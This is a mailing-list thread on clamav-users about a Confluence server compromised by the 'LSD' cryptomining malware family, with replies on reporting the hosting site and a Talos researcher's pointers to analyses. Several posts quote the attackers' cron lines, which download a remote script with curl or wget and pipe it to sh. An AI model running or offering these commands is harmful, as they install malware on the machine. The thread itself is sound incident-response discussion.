Mailing List Archive

[clamav-users] LSD Malwares
Dear Friends,

We recently faced an Atlassian Confluence issue lately.
Atlassian issued a security advisory the 29/03/2019
<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>
.
Following this thread
<https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>,
We understood what happened on our server.
Confluence is running in its own user space and have seen its crontab
hacked.

On our Debian Stretch the 'crontab -u confluence -e' shows a non legit
instruction :

*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O-
https://dd.heheda.tk/i.jpg)|sh

Obviously the security flaw in Confluence open the gate to this behaviour.
As we are running Confluence in its own user space, the i.jpg who contains
the shell script file didn't harm our server. No malwares have been
deployed however the server was shutting down immediately after starting.

We cleaned up the crontab and upgraded Confluence to avoid any further
infection.

However we need to check our installation and I'm wondering if ClamAV knows
already this malware family
<https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>.
I already open a report to ClamAV. is there any user who faced this issue
and is ClamAV ready to detect and cleanup our Linux boxes ?

Any pointers about any informations about this LSD Malware family will be
greatly appreciated as I try to evaluate the risks for our infrastructure
(I checked various DB with no success and googled too).

Warmly.

Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
Re: [clamav-users] LSD Malwares [ In reply to ]
Perhaps it would also be worthwhile to report dd.heheda.tk to their
hosting provider & domain registrar that they are hosting malware and
get that site shut down...

https://github.com/vrtadmin/clamav-faq

http://www.clamav.net/contact.html#ml
Re: [clamav-users] LSD Malwares [ In reply to ]
That domain is hosted on a cloudflare IP block. They're become part of the problem.

dp

Re: [clamav-users] LSD Malwares [ In reply to ]
The same applies: Report it. Cloudflare will either forward the
complaint for you, or block the offending URL (or both).

Re: [clamav-users] LSD Malwares [ In reply to ]
Hi All,

Thanks for your feedback.
I'm going to report to Cloudflare this URL.

However keep in mind that there are other URLs who are involved in this
family.
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
https://pastebin.com/raw/wR3ETdbi)|sh
This one targets Jenkins, another popular OpenSource tool, not used on our
infrastructure though.

I'm still very interested with the consequences of this malwares. Any hints
will be greatly appreciated.

Thanks.

Light

Pudhuveedu / Xavier

PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>

Re: [clamav-users] LSD Malwares [ In reply to ]
Dear ClamAV-users,

I reached out to my contacts at Cloudflare to take action.

--
Joel Esler
Manager, Communities Division

On Apr 25, 2019, at 11:25 PM, Xavier Maysonnave via clamav-users <clamav-users@lists.clamav.net<mailto:clamav-users@lists.clamav.net>> wrote:

Hi All,

Thanks for your feedback.
I'm going to report to Cloudflare this URL.

However keep in mind that there are other URLs who are involved in this family.
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget<https://pastebin.com/raw/wR3ETdbi%7C%7Cwget> -q -O- https://pastebin.com/raw/wR3ETdbi)|sh<https://pastebin.com/raw/wR3ETdbi)%7Csh>
This one targets Jenkins, another popular OpenSource tool, not used on our infrastructure though.

I'm still very interested with the consequences of this malwares. Any hints will be greatly appreciated.

Re: [clamav-users] LSD Malwares [ In reply to ]
Pls check my Previous EMAIL "UNSUBSCRIBE ME...ETC", just sent.
TXS

Have a nice Weekend!

?Obter o BlueMail para Android ?

Re: [clamav-users] LSD Malwares [ In reply to ]
Go here:

Scroll the page… unsubscribe is there….

Re: [clamav-users] LSD Malwares [ In reply to ]
Please unsubscribe yourself, do the exact same thing you did to subscribe but to unsubscribe. There’s also a list-unsubscribe header or you can refer to.

Emailing random people will not achieve success as we cannot unsubscribe you.

Re: [clamav-users] LSD Malwares [ In reply to ]
Xavier,

From the information you provided in your initial email, it sounds like the
malware you encountered is described in-depth here:

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

That blog post provides a lot of insight into what the malware they
analyzed did, which will hopefully provide you with a way to better
understand what the malware may have done on your machines. It's difficult
to know for sure, though, since the one you encountered may have had
differences to the one described. Your best bet to remediate is to just
restore the server from known-good backups, if possible.

At the end of last year, we published a blog post that tracked three groups
spreading this type of malware. From
https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html,
the groups tended to follow these TTPs:
- Used Malicious shell scripts masquerading as JPEG files with the name
"logo*.jpg" that install cron jobs and download and execute miners.
- Used variants of the open-source miner XMRig intended for botnet mining,
with versions dependent on the victim's architecture.
- Scanned for and attempted to exploit recently published vulnerabilities
in servers such as Apache Struts2, Oracle WebLogic and Drupal.
- Used malicious scripts and malware hosted on Pastebin sites, Git
repositories and domains with .tk TLDs.

As you can tell, there's a lot of overlap between all of these, and it's
not uncommon for one actor to take the scripts and binaries used by another
and start using them (with slight modifications to use different C2, mine
to a different wallet, etc.)

Since there's so much overlap between tools and techniques, it's difficult
to say for sure, but at first glance the infrastructure described in the
Anomali blog post appears related to that of the malware described by these
two articles as well:

Nov 2018:
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptocurrency-mining-malware-targets-linux-systems-uses-rootkit-for-stealth
Feb 2019:
https://blog.trendmicro.com/trendlabs-security-intelligence/linux-coin-miner-copied-scripts-from-korkerds-removes-all-other-malware-and-miners/

-Andrew

Andrew Williams
Malware Research Engineer
Cisco Talos

On Thu, Apr 25, 2019 at 11:27 PM Xavier Maysonnave via clamav-users <

Re: [clamav-users] LSD Malwares [ In reply to ]
Hi Joel,

Thanks for your action.
I also open a request @ Cloudflare.
*https://support.cloudflare.com/hc/requests/1677155
<https://support.cloudflare.com/hc/requests/1677155>*
This ticket is not public though but it could be useful to forward its
reference to your Cloudflare contact.

Re: [clamav-users] LSD Malwares [ In reply to ]
Dear Friends,

I got an answer from Cloudflare. Here is their message :

Hi Xavier Maysonnave,

We have placed a interstitial up and sent a notification to the user.

Regards,

Cloudflare Trust and Safety

Re: [clamav-users] LSD Malwares [ In reply to ]
Hi Andrew,
Thanks for your valuable informations.

Re: [clamav-users] LSD Malwares [ In reply to ]
Thank you for writing in.

or by sending an email to Clamav-users-leave@lists.Clamav.net<mailto:Clamav-users-leave@lists.Clamav.net>

Thanks!

Obter o BlueMail para Android<http://www.bluemail.me/r?b=14726>